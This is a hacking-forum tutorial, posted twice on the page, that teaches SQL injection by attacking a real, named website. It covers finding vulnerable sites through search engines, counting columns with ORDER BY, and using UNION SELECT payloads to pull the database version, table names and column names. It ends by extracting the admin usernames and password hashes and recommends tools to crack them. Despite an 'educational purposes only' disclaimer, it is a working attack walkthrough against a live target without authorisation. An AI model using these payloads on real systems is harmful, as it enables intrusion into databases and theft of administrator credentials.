I know what you're thinking. "Another SQL Tut? Really, Entity, did we need another?" Well..Yes. When I was learning I had to read 4 or 5 tuts to actually get it to work. Im hoping that this tutorial will help more.
SQL INJECTION
Note :: Neither Hackforums.net nor Entity are responsible for what you do with this information, it is provided for educational purposes only.
Before we even start, you need some tools.
HackBar [FireFox]
Admin Finder [We wont be using the AdminFinder in this tut, but you WILL need it]
Cain and Abel (Google it)
Now, we need a site. To find a site, we need to go to Google, and put in one of the following.
To check if a site is vulnerable, put a ' after it, like so:
You should get an SQL error, like this one:
Okay, Now that you have your vulnerable site, Ill show you how to do an SQL injection on it.
Ill be doing my injection on
So, I pull up my site, and I add a ' after it, and I get this.
Remember, when checking the vulnerability, an error is a good thing.
Now, I need to find out how many columns are in the site. So I start with:
Always start with 3, because a site has to have atleast 3 columns. If you get an error at 3, then your target site doesnt support union statements.
When I order by 3 I get this:
So the site has more than 3 columns. Thats a good sign. After 3, I always go to ten. So:
And I get this :
So the site has less than 10 columns. It turns out that this site had 6 columns. So now we need to know which of those columns are vulnerable. So we do this :
NOTICE THE - IN FRONT OF THE 130. It is very important and needs to be there every time you do a Union select statement. So on our site we get this ::
Columns 2,4,and 5 are vulnerable.
Now we have to find out the SQL version of the site. Version 5 is our favorite, because it has information.schema. Information.schema is our friend, because it tells us things. Meaning we dont have to guess the table names, like we would in version 4. So to find out what version our site is running, we do this : Now that we've done that, our site shows this :
Yay! Our site is running version 5. So how are we gonna get the tables? Just like this.
So on our site, you see this :
See where it says tar_admin? Thats what we want. But how are we gonna get the info thats in there? Like this. *If you downloaded the hackbar, like I told you to, your gonna need it*
So, tar_admin is what we want to get into, but putting it just like that wont work. We need too convert it into CHAR (). The HackBar can do that. Highlight what you want to turn into CHAR () and click MySQL, then MYSQL CHAR ().
So the whole thing is :
So we do that, and our site shows us this :
Out of that, we want the username and password, right? So, to get that, we do this :
0x3a is the Hex for a colon, so dont worry about that.
When we input that, our site shows us this :
You guys know what that is? Thats the usernames and the MD5 encrypted passwords. The passwords arent always encrypted. With this particular site, I had bad luck, as the MD5 was salted. Use Cain And Abel or John The Ripper (linux) to crack md5.
DO NOT POST ANYWHERE EXCEPT HACKFORUMS OR CODERZUNITED WITHOUT MY PERMISSION.
I hope you enjoyed my tutorial, and I hope that this works for everyone. Post questions or comments here, thanks.
-Entity
SQL INJECTION
Note :: Neither Hackforums.net nor Entity are responsible for what you do with this information, it is provided for educational purposes only.
Before we even start, you need some tools.
HackBar [FireFox]
Admin Finder [We wont be using the AdminFinder in this tut, but you WILL need it]
Cain and Abel (Google it)
Now, we need a site. To find a site, we need to go to Google, and put in one of the following.
Spoiler (Click to View)
Code:
http://www.site.com/news.php?id=5'
Code:
PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\Domains\tartanarmy.com\wwwroot\news\news.php on line 19 PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\Domains\tartanarmy.com\wwwroot\news\news.php on line 25
Okay, Now that you have your vulnerable site, Ill show you how to do an SQL injection on it.
Ill be doing my injection on
Code:
http://www.tartanarmy.com/news/news.php?id=130
So, I pull up my site, and I add a ' after it, and I get this.
Spoiler (Click to View)
Now, I need to find out how many columns are in the site. So I start with:
Code:
http://www.tartanarmy.com/news/news.php?id=130 order by 3
When I order by 3 I get this:
Spoiler (Click to View)
Code:
http://www.tartanarmy.com/news/news.php?id=130 order by 10
Spoiler (Click to View)
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,5,6
Spoiler (Click to View)
Now we have to find out the SQL version of the site. Version 5 is our favorite, because it has information.schema. Information.schema is our friend, because it tells us things. Meaning we dont have to guess the table names, like we would in version 4. So to find out what version our site is running, we do this :
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,@@version,6
Spoiler (Click to View)
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema= database ()
Spoiler (Click to View)
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name= tar_admin
Code:
tar_admin = CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)
So the whole thing is :
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name= CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)
So we do that, and our site shows us this :
Spoiler (Click to View)
Code:
http://www.tartanarmy.com/news/news.php?id=-130 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6 from tar_admin
When we input that, our site shows us this :
Spoiler (Click to View)
DO NOT POST ANYWHERE EXCEPT HACKFORUMS OR CODERZUNITED WITHOUT MY PERMISSION.
I hope you enjoyed my tutorial, and I hope that this works for everyone. Post questions or comments here, thanks.
-Entity
Categories:
sql injection